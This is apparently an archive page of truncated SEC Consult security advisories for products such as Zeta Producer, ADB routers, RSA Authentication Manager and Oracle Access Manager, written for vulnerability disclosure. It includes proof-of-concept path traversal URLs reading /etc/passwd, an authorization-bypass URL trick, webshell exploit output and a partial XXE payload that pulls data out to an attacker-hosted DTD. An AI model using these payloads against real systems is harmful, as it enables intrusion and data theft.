Multiple functions in the application are not protected by the existing anti-CSRF token, which allows an attacker to perform a cross-site request forgery attack to at least add, update or delete entries, among other actions. Proof of concept: - 1. SQL Injection (CVE-2018-14058) The following URLs demonstrate the issue: http:///webservice/rest/asset-count?apikey=[...]= http:///webservice/rest/asset-inquire?apikey=[...]= http:///webservice/rest/asset-list?apikey=[...]= http:///webservice/rest/document-count?apikey=[...]= http:///webservice/rest/document-inquire?apikey=[...]= http:///webservice/rest/document-list?apikey=[...]= http:///webservice/rest/object-count?apikey=[...]= http:///webservice/rest/object-inquire?apikey=[...]= http:///webservice/rest/object-list?apikey=[...]= Note that a valid API key that is granted at least either "Assets", "Documents" or "Objects" permission is required to perform an SQL injection attack against associated API endpoints successfully. 2. Stored Cross-site Scripting (CVE-2018-14059) Most of the text fields in pop-up dialogs and data entries in the application are vulnerable to the cross-site scripting vulnerability, which can be exploited by an authenticated attacker. For example, the attacker could insert an attack payload while performing at least the following actions: 1) Edit a user account's first name/last name/e-mail address. 2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/ Quantity Value/Static Routes entry value in the table. 3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/ Field-Collections/Objectbrick/Classification Store item. The vendor stated that many identified XSS issues only affect administrative functions and hence the issues will not be fixed: "They are only affecting administrative functionalities (higher privileges required) - so this isn't used by non-trusted users - a check just adds additional overhead without any benefits for security." SEC Consult argued multiple times that XSS can still be exploited e.g. when a higher privileged user gets attacked and the issues should be fixed nevertheless. 3. Cross-site Request Forgery (CVE-2018-14057) The existing anti-CSRF token in the HTTP request header named "X-pimcore-csrf-token" was found to be validated only in the "Settings > Users / Roles" function. Therefore, an attacker could perform a cross-site request forgery attack against virtually all other functions in order to at least add, update and delete data without having to submit the anti-CSRF token. The non-exhaustive list of affected requests are listed below: POST /admin/asset/add-asset POST /admin/asset/add-asset-compatibility GET /admin/asset/delete GET /admin/asset/import-server GET /admin
SEC Consult SA-20180712-0 :: Remote Code Execution & Local File Disclosure in Zeta Producer Desktop CMS
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 > === title: Remote Code Execution & Local File Disclosure product: Zeta Producer Desktop CMS vulnerable version: <=14.2.0 fixed version: >=14.2.1 CVE number: CVE-2018-13981, CVE-2018-13980 impact: critical homepage: https://www.zeta-producer.com found: 2017-11-25 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "With Zeta Producer, the website builder and online shop system for Windows, you can create and manage your website locally, on your computer. Get without expertise in 3 steps to your own homepage: select design, paste content, publish website. Finished." Source: https://www.zeta-producer.com/de/index.html Business recommendation: The vendor provides a patched version which should be installed immediately. Users of the product also need to verify that the affected widgets are updated in the corresponding website project! It could be necessary to rebuild the whole project or copy the new widgets to the website projects. For further information consult the vendor. Furthermore, an in-depth security analysis is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Remote Code Execution (CVE-2018-13981) The email contact functionality of the widget "formmailer" can upload files to the server but if the user uploads a PHP script with a .php extension then the server will rename it to .phps to prevent PHP code execution. However, the attacker can upload .php5 or .phtml to the server without any restriction. These alternative file extensions can be executed as PHP code. Furthermore, the server will create a folder to store the files, with a random name using PHP's "uniqid" function. Unfortunately, if the server permits directory listing, the attacker can easily browse to the uploaded PHP script. If no directory listing is enabled the attacker can still bruteforce the random name to gain remote code execution via the PHP script as well. Testing on a local server it took about 20 seconds to brute force the random name. This attack will be slower over the Internet but it is still feasible. Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, they are also vulnerable because the web server will be running on TCP port 9153. The root cause is in the widget "formmailer" which is enabled by default. The following files are affected: - /assets/php/formmailer/SendEmail.php - /assets/php/formmailer/functions.php 2) Local File Disclosure (CVE-2018-13980) If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an unauthenticated attacker can read local files by exploiting path traversal issues. The following files are affected: - /assets/php/filebrowser/filebrowser.main.php Proof of concept: - 1) Remote Code Execution (CVE-2018-13981) The following python script can be used to exploit the chain of vulnerabilities. [.. code has been removed to prevent misuses ..] When the script is executed, a PHP script (shell) will be uploaded automatically. # $ python exploit.py # [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php # # 5a1a5bc991afe # 5a1a5bc99453a # 10812 # [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5 # uid=33(www-data) gid=33(www-data) groups=33(www-data) 2) Local File Disclosure (CVE-2018-13980) The parameter "file" in the "filebrowser.main.php" script can be exploited to read arbitrary files from the OS with the privileges of the web server user. Any unauthenticated user can exploit this issue! http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd=download http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc=list Vulnerable / tested versions: - The following versions have been tested which were the latest version available at the time of the test: Zeta Producer Desktop CMS 14.1.0 Zeta Producer Desktop CMS 14.2.0 Source: - https://www.zeta-producer.com/de/download.html - https://github.com/ZetaSoftware/zeta-producer-content/ Vendor contact timeline: 2017-11-29: Contacting vendor through i...@zeta-producer.com and various other email addresses from the website. No reply. 2017-12-13:
SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 > === title: Remote code execution via multiple attack vectors product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1 vulnerable version: FW 01 - 01.01.10(01) fixed version: FW 02 CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981 impact: High homepage: https://www.wago.com/ found: 2018-04-25 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "New ideas are the driving force behind our success WAGO is a family-owned company headquartered in Minden, Germany. Independently operating for three generations, WAGO is the global leader of spring pressure electrical interconnect and automation solutions. For more than 60 years, WAGO has developed and produced innovative products for packaging, transportation, process, industrial and building automation markets amongst others. Aside from its innovations in spring pressure connection technology, WAGO has introduced numerous innovations that have revolutionized industry. Further ground-breaking inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." Source: http://www.wago.us/wago/ "For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY 7300T Web Panels help you reinforce the quality of your machinery and equipment with a refined design and industry-leading software. Learn more about how the right Web Panels make a difference. HMI components are the finishing touch for machines or systems and they have an overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing HMIs that leave a lasting impression and significantly increase both the value and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes." Source: http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp Business recommendation: HMI displays are widely used in SCADA infrastructures. The link between their administrative (or informational) web interfaces and the users which access these interfaces is critical. The presented attacks demonstrate how simple it is to inject malicious code in order to break the security of this link by exploiting minimal user interaction. As a consequence a computer which is used for HMI administration should not provide any possibility to get compromised via malicious script code. One possible solution may be e.g.: * Don't allow email clients * Don't provide Internet access at all on the HMI stations SEC Consult recommends to immediately apply the available patches from the vendor. A thorough security review should be performed by security professionals to identify further potential security issues. Vulnerability overview/description: --- 1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) Reflected cross site scripting vulnerabilities were identified within multiple PHP scripts in the admin interface. The parameter JSON input which is sent to the device is not sanitized sufficiently. An attacker can exploit this vulnerability to execute arbitrary scripts in the context of the attacked user and gain control over the active session. This vulnerability is present for authenticated and unauthenticated users! 2) Stored Cross-Site Scripting (CVE-2018-12981) A stored cross-site scripting vulnerability was identified within the "PLC List" which can be configured in the web interface of the e!Display. By storing a payload there, an administrative or guest user can be attacked without tricking them to visit a malicious web site or clicking on an malicious link. This vulnerability is only present for authenticated users! 3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as privileged user, it is not possible to upload a file directly to the web root but on many other locations on the file system. The normal user 'user' and the administrative user 'admin' can both upload files to the system. 4) Incorrect Default Permissions (CVE-2018-12979) Due to incorrect default permissions a file in the web root can be overwritten by the unprivileged 'www' user. This is the same user which is used in the context of the web server. 5) Remote code execution via
SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/ Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-2 > === title: Privilege escalation via linux group manipulation product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13110 impact: critical homepage: http://www.adbglobal.com found: 2016-07-11 by: Stefan Viehböck (Office Vienna) Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP. Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Privilege escalation via linux group manipulation (CVE-2018-13110) An attacker with standard / low access rights within the web GUI is able to gain access to the CLI (if it has been previously disabled by the configuration) and escalate his privileges. Depending on the CLI features it is possible to extract the whole configuration and manipulate settings or gain access to debug features of the device, e.g. via "debug", "upgrade", "upload" etc. commands in the CLI. Attackers can gain access to sensitive configuration data such as VoIP credentials or other information and manipulate any settings of the device. Proof of concept: - 1) Privilege escalation via linux group manipulation (CVE-2018-13110) It is possible to manipulate the group name setting of "Storage users" and overwrite the local linux groups called "remoteaccess" or "localaccess" in (in /etc/group) which define access to Telnet or SSH on the ADB devices. It may be possible to overwrite the "root" group as well but it may brick the device and the default user is already within the "root" group. Hence this attack has not been further tested. The following steps describe the attack: a) Add a new group called "localaccess" via the web GUI here: http://$IP/ui/dboard/storage/storageusers?backto=storage This will generate the following new group in /etc/group. The original "localaccess" group will overwritten. localaccess:Storage Group:5001: b) Then delete this group via the web GUI again, the entry will be removed from /etc/group completely. c) Afterwards, create the following new group name entry via the web GUI and add your user account (e.g. admin) wh
SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/ Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-1 > === title: Authorization Bypass product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13109 impact: critical homepage: http://www.adbglobal.com found: 2016-06-28 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP. It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP. The attacker needs some user account, regardless of the permissions, for login, e.g. the default one provided by the ISP or printed on the device can be used. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Authorization bypass vulnerability (CVE-2018-13109) Depending on the firmware version/feature-set of the ISP deploying the ADB device, a standard user account may not have all settings enabled within the web GUI. An authenticated attacker is able to bypass those restrictions by adding a second slash in front of the forbidden entry of the path in the URL. It is possible to access forbidden entries within the first layer of the web GUI, any further subsequent layers/paths (sub menus) were not possible to access during testing but further exploitation can't be ruled out entirely. Proof of concept: - 1) Authorization bypass vulnerability (CVE-2018-13109) Assume the following URL is blocked/forbidden within the web GUI settings: http://$IP/ui/dboard/settings/management/telnetserver Adding a second slash in front of the blocked entry "telnetserver" will enable full access including write permissions to change settings: http://$IP/ui/dboard/settings/management//telnetserver This works for many other settings within the web GUI! In our tests it was not possible to access subsequent layers, e.g.: Assume that both the proxy menu and submenu "rtsp" settings are blocked, a second slash will _not_ enable access to the RTSP settings: http://$IP/ui/dboard/settings/proxy//rtsp Nevertheless, it can't be ruled out that sub menus can be accessed too when further deeper tests are being performed. Vulnerable / tested versions: - The following devices & firmware have been tested which were the most recent versions at the time of discovery: The firmware versions depend on the ISP / customer of ADB and may vary! ADB P.RG AV4202N - E_
SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities as they have been split up for better readability: Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/ Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/ SEC Consult Vulnerability Lab Security Advisory < 20180704-0 > === title: Local root jailbreak via network file sharing flaw product: All ADB Broadband Gateways / Routers (based on Epicentro platform) vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. fixed version: see "Solution" section below CVE number: CVE-2018-13108 impact: critical homepage: http://www.adbglobal.com found: 2016-06-09 by: Johannes Greil (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies." Source: https://www.adbglobal.com/about-adb/ "Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions." Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast Business recommendation: By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges. Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures. Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can enable attacks on connected networks, such as administrative networks managed by the ISP or other users. It is highly recommended by SEC Consult to perform a thorough security review by security professionals for this platform. It is assumed that further critical vulnerabilities exist within the firmware of this device. Vulnerability overview/description: --- 1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) Most ADB devices offer USB ports in order for customers to use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks e.g. via FTP server functionality which has been fixed in more recent firmware versions. The "Network File Sharing" feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon within the smb.conf on the device has set "wide links = no" which normally disallows gaining access to the root file system of the device using symlink attacks via a USB drive. But an attacker is able to exploit both a web GUI input validation and samba configuration file parsing problem which makes it possible to access the root file system of the device with root access rights via a manipulated USB drive. The attacker can then edit various system files, e.g. passwd and session information of the web server in order to escalate web GUI privileges and start a telnet server and gain full system level shell access as root. This is a local attack and not possible via remote access vectors as an attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices hence this attack is quite p
SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 > === title: XXE & XSS vulnerabilities product: RSA Authentication Manager vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1 fixed version: 8.3 P1 and later CVE number: CVE-2018-1247 impact: High homepage: https://www.rsa.com found: 2017-11-16 by: Mantas Juskauskas (Office Vilnius) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime." Source: https://www.rsa.com/en-us/company/about Business recommendation: By exploiting the vulnerabilities documented in this advisory an attacker can obtain sensitive information from the RSA Authentication Manager file system, initiate arbitrary TCP connections or cause DoS. In addition to this, clients of the RSA Authentication manager can be affected by exploiting client-side issues. SEC Consult recommends to apply the available patches from the vendor. Vulnerability overview/description: --- 1) XML External Entity Injection (XXE) (CVE-2018-1247) The used XML parser is resolving XML external entities which allows an authenticated attacker (or an attacker that is able to trick an authenticated user into importing malicious XML files) to read files, send requests to systems on the internal network (e.g port scanning) or cause a DoS (e.g. billion laughs attack). This issue has been fixed by RSA as described in the advisory DSA-2018-086. (http://seclists.org/fulldisclosure/2018/May/18) 2) Cross-site Flashing The vulnerable flash file does not filter or escape the user input sufficiently. This leads to a reflected cross-site scripting vulnerability. With reflected cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code into the victim's web browser. Once the victim clicks a malicious link the attacker's code is executed in the context of the victim's web browser. The vulnerability exists in a third party component called pmfso. This issue has been fixed by RSA as described in the advisory DSA-2018-082. 3) DOM based Cross-site Scripting Several client-side scripts handle user supplied data with insufficient validation before storing it in the DOM. This issue can be exploited to cause reflected cross-site scripting. The identified issues exist in third party components. One of the affected components is PopCalendarX which has an assigned CVE (CVE-2017-9072). This issue has been fixed by RSA as described in the advisory DSA-2018-082. Two further issues affecting other third party components are not yet fixed, as the third party vendor did not supply a patch to RSA yet. Proof of concept: - 1) XML External Entity Injection (XXE) (CVE-2018-1247) The Security Console of the RSA Authentication Manager allows authenticated users to import SecurID Token jobs in XML format. By importing an XML file with malicious XML code to the application, it is possible to exploit a blind XXE vulnerability within the application. For example, in order to read arbitrary files from the RSA Authentication Manager OS, the following malicious XML file can be imported via the affected endpoint: == POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1 Host: :7004 Cookie: [snip] [snip] -9721941626073 Content-Disposition: form-data; name="textImportFileName.theFile"; filename="xxe_test.xml" Content-Type: text/xml /a.dtd"> -9721941626073 Content-Disposition: form-data; name="textImportFileName.uploadResult" [snip] == In this case, the attacker has to host the defined a.dtd file in the web root of a controlled web server: == # cat /var/www/a.dtd :8080/%p1;'>"> %p2; == Assuming that the RSA Authentication Manager OS has network level access to the TCP port 80 and 8080 of th
Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
The following CVE numbers have been assigned now: XSS issue: CVE-2018-11090 Arbitrary File Upload: CVE-2018-11091 On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20180514-0 > > === > title: Arbitrary File Upload & Cross-site scripting > product: MyBiz MyProcureNet > vulnerable version: 5.0.0 > fixed version: unknown > CVE number: - > impact: Critical >homepage: http://www.mybiz.net/ > found: 2018-01-29 > by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) > Fikri Fadzil (Office Singapore) > Wan Ikram (Office Kuala Lumpur) > Jasveer Singh (Office Kuala Lumpur) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "MyBiz is a company fixated on developing technology which transforms the way > business is done online. At the intersection of what one business needs from > another is the potential for value to be created differently. This > intersection for the exchange of value requires technology but in > fundamentally very different ways from traditional enterprise systems. MyBiz > believes that the chemistry of business is the business relationships between > enterprises. The strength of the business relationship drives the success and > future of the business. MyBiz believes that these business relationships need > to be captured and orchestrated. MyBiz developed our proprietary Business > Relationship Network engine, a platform to capture business relationships as > data to drive new business services which create value efficiently." > > Source: http://www.mybiz.net/copy-of-our-story > > > Business recommendation: > > The vendor did not reply to our inquiries since February 2018 hence the issues > might still exist in current versions. > > SEC Consult recommends not use this product until a thorough security review > has been performed by security professionals and all identified issues have > been resolved. It is assumed that MyBiz products are affected by further > critical security issues. > > > Vulnerability overview/description: > --- > The identified vulnerabilities can be exploited after authentication but > the registration for the application is usually open for anyone. > > 1. Arbitrary File Upload > A malicious file can be uploaded to the webserver by an attacker. It is > possible for an attacker to upload a script to issue operating system > commands. > > This vulnerability occurs because an attacker is able to adjust the > "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary > extensions to the whitelist during the upload. > > For instance, if the extension .asp is added to the > "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server > accepts "secctest.asp" as legitimate file. Hence malicious files can be > uploaded in order to execute arbitrary commands to take over the server. > > > 2. Reflected Cross-site scripting > This vulnerability within "ProxyPage.aspx" allows an attacker to inject > malicious client side scripting which will be executed in the browser of > users if they visit the manipulated site. > > > Proof of concept: > - > The proof of concept has been removed as no patch is available. > > > Vulnerable / tested versions: > - > MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. > This > was the latest version available at the time of the test. > > > Vendor contact timeline: > > 2018-02-22: Contacting vendor through i...@mybiz.net (no response) > 2018-02-27: Request update from vendor (no response) > 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us > (no response) > 2018-05-14: Public release of security advisory > > > Solution: > ----- > None > > > Workaround: > --- > None > > > Advisory URL: > - > https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html > > ~~~~~~~~~~~~~~~~~~~~
SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 > === title: Arbitrary File Upload & Cross-site scripting product: MyBiz MyProcureNet vulnerable version: 5.0.0 fixed version: unknown CVE number: - impact: Critical homepage: http://www.mybiz.net/ found: 2018-01-29 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) Fikri Fadzil (Office Singapore) Wan Ikram (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "MyBiz is a company fixated on developing technology which transforms the way business is done online. At the intersection of what one business needs from another is the potential for value to be created differently. This intersection for the exchange of value requires technology but in fundamentally very different ways from traditional enterprise systems. MyBiz believes that the chemistry of business is the business relationships between enterprises. The strength of the business relationship drives the success and future of the business. MyBiz believes that these business relationships need to be captured and orchestrated. MyBiz developed our proprietary Business Relationship Network engine, a platform to capture business relationships as data to drive new business services which create value efficiently." Source: http://www.mybiz.net/copy-of-our-story Business recommendation: The vendor did not reply to our inquiries since February 2018 hence the issues might still exist in current versions. SEC Consult recommends not use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that MyBiz products are affected by further critical security issues. Vulnerability overview/description: --- The identified vulnerabilities can be exploited after authentication but the registration for the application is usually open for anyone. 1. Arbitrary File Upload A malicious file can be uploaded to the webserver by an attacker. It is possible for an attacker to upload a script to issue operating system commands. This vulnerability occurs because an attacker is able to adjust the "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary extensions to the whitelist during the upload. For instance, if the extension .asp is added to the "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server accepts "secctest.asp" as legitimate file. Hence malicious files can be uploaded in order to execute arbitrary commands to take over the server. 2. Reflected Cross-site scripting This vulnerability within "ProxyPage.aspx" allows an attacker to inject malicious client side scripting which will be executed in the browser of users if they visit the manipulated site. Proof of concept: - The proof of concept has been removed as no patch is available. Vulnerable / tested versions: - MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This was the latest version available at the time of the test. Vendor contact timeline: 2018-02-22: Contacting vendor through i...@mybiz.net (no response) 2018-02-27: Request update from vendor (no response) 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us (no response) 2018-05-14: Public release of security advisory Solution: - None Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC C
SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)
We have published an accompanying blog post to this technical advisory with further information: Blog: https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/ Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ SEC Consult Vulnerability Lab Security Advisory < 20180503-0 > === title: Authentication Bypass product: Oracle Access Manager vulnerable version: 11.1.2.3.0, 12.2.1.3.0 fixed version: April 2018 CPU CVE number: CVE-2018-2879 impact: Critical homepage: https://www.oracle.com/ found: 2017-11 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Oracle Access Management provides innovative new services that complement traditional access management capabilities. It not only provides Web SSO with MFA, coarse grained authorization and session management but also provides standard SAML Federation and OAuth capabilities to enable secure access to external cloud and mobile applications. It can be easily integrated with the Oracle Identity Cloud Service to support hybrid access management capabilities that can help customers to seamlessly protect on-premise and cloud applications and workloads." URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html Business recommendation: SEC Consult did not conduct a full security audit as only a cryptographic implementation was analyzed. However, since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security. Given the central position in an organization's security infrastructure, we recommend Oracle's customers to either conduct a full audit of the component or to request the results of such audits from Oracle. The security patches from the Oracle CPU April 2018 have to be applied immediately! Vulnerability overview/description: --- Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM) is vulnerable to an authentication bypass vulnerability. An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts! This security vulnerability completely breaks the main functionality of the OAM product. An attacker can create a scenario in which the OAM replies differently depending on whether the PKCS#7 padding of an encrypted message is valid or invalid. This behavior can be used to mount a padding oracle attack. An attacker can decrypt and encrypt several messages used to communicate between the OAM and web servers. The attack described here allows an attacker to create arbitrary authentication cookies which are accepted by the OAM. Proof of concept: - A successful user authentication with Oracle Access Manager (OAM) involves the following steps: 1. The user accesses a protected resource. 2. A component in the web server (the Oracle Webgate) answers this request with a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM in a URL parameter. 3. The user authenticates against the OAM (e.g. with username and password). 4. The OAM redirects the user back to the web server. Information about the successful login is passed in the parameter "encreply". 5. The web server redirects the user to the resource that was initially requested. An encrypted authentication token is stored in a cookie (OAMAuthnCookie). 6. The authentication token in the OAMAuthnCookie cookie is used from now on to authenticate the user. All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with a CBC cipher using the same key. This key is shared between the OAM and the web server. The attack exploits step 2 of the authentication process: the attacker sends manipulated "encquery" parameters and observes the server's response. The following shows an example of a decrypted encquery: salt=sF/vMVV0Gkr/k+IhbrXYWg== wh=agentid wu=%2F wo=1 rh=http://server: ru=%2F reqtime=151000 ctx= validate= where * the "salt" is a randomly generated value * "validate" is a hash over certain parts of the message (MD5) To conduct a padding oracle attack, an attacker would modify the second last encrypted block of an encrypted message. Most of the time, this causes the padding in the decrypted message to be invalid. In case the padding is accepted, the attacker gains information about the p
SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products
